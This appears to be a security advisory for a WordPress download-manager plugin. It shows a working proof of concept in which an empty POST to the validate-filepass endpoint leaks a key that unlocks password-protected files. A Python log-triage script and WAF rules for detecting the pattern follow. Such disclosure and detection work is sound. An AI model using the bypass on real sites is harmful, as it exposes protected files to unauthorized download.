The plugin leaks master key information without requiring a password, allowing attackers to download arbitrary password-protected package files.
- Create a password protected package containing one or more files.
- Navigate to the download page of the package (e.g. `/download/package1`).
- Inspect the "Download" button beside one of the packaged files. The HTML should look like this:
```html
<button
  class="inddl btn btn-primary btn-sm"
  data-pid="123"
  data-file="12345678"
  rel="https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678"
  data-pass="#pass_113_1679405558600">
  <i class="fa fa-download"></i>
  Download
</button>
```
- Note the `wpdmdl` and `ind` URL parameters for later.
- Send a POST request with an empty body to `/wp-json/wpdm/validate-filepass`:
```javascript
fetch("/wp-json/wpdm/validate-filepass", {
  "headers": {
    "accept": "*/*",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text()).then(text => console.log(text));
```
- The response will look like the following:
```json
{"success":true,"downloadurl":"\/wp-json\/wpdm\/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind="}
```
- Construct a download URL as follows, using the above `_wpdmkey` parameter, as well as the `wpdmdl` and `ind` parameters from above:
```
https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef
```
- See that the file may be downloaded from that URL, without any knowledge of its password.
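For site operators who want to spot this pattern in traffic, the following triage script (an added example, not part of the advisory or the plugin) flags the two steps described above: a `validate-filepass` POST that carries no form fields at all, followed by a `_wpdmkey` download from a client that never submitted a password. It assumes a reverse proxy or WAF that writes one JSON object per request including the POST body (a constructed log schema; most default access-log formats do not record bodies).

```python
import json
from urllib.parse import urlparse, parse_qs

VALIDATE_PATH = "/wp-json/wpdm/validate-filepass"

# Constructed sample log: 198.51.100.4 follows the normal flow (password sent,
# then a keyed download); 203.0.113.7 matches the leak pattern from the advisory
# (empty POST, then a download carrying the _wpdmkey that came back).
SAMPLE_LOG = """\
{"client":"203.0.113.7","method":"GET","uri":"/download/package1/","body":""}
{"client":"203.0.113.7","method":"POST","uri":"/wp-json/wpdm/validate-filepass","body":""}
{"client":"203.0.113.7","method":"GET","uri":"/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef","body":""}
{"client":"198.51.100.4","method":"POST","uri":"/wp-json/wpdm/validate-filepass","body":"wpdmdl=123&ind=12345678&password=s3cret"}
{"client":"198.51.100.4","method":"GET","uri":"/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=ghijkl","body":""}
"""


def triage(log_text):
    """Return (client, rule, detail) findings for the validate-filepass leak pattern."""
    findings = []
    keyless_post_clients = set()  # asked for a key with an empty request body
    validated_clients = set()     # sent a non-empty validation body at least once
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        client = rec["client"]
        url = urlparse(rec["uri"])
        query = parse_qs(url.query)
        if rec["method"] == "POST" and url.path == VALIDATE_PATH:
            if rec.get("body", "").strip() == "":
                keyless_post_clients.add(client)
                findings.append((client, "empty-validate-filepass",
                                 "password validation called with no form fields"))
            else:
                validated_clients.add(client)
        elif rec["method"] == "GET" and "_wpdmkey" in query:
            pid = query.get("wpdmdl", ["?"])[0]
            # A keyed download is suspicious if this client obtained its key via
            # an empty POST, or never went through validation on this proxy at all.
            if client in keyless_post_clients or client not in validated_clients:
                findings.append((client, "unvalidated-keyed-download",
                                 f"_wpdmkey download of package {pid} without password validation"))
    return findings


if __name__ == "__main__":
    for client, rule, detail in triage(SAMPLE_LOG):
        print(f"{client}\t{rule}\t{detail}")
```

Until the plugin is updated, the same two rules can be turned into a blocking WAF policy: reject `validate-filepass` requests with an empty body, and require a prior validation from the same session before honouring `_wpdmkey`.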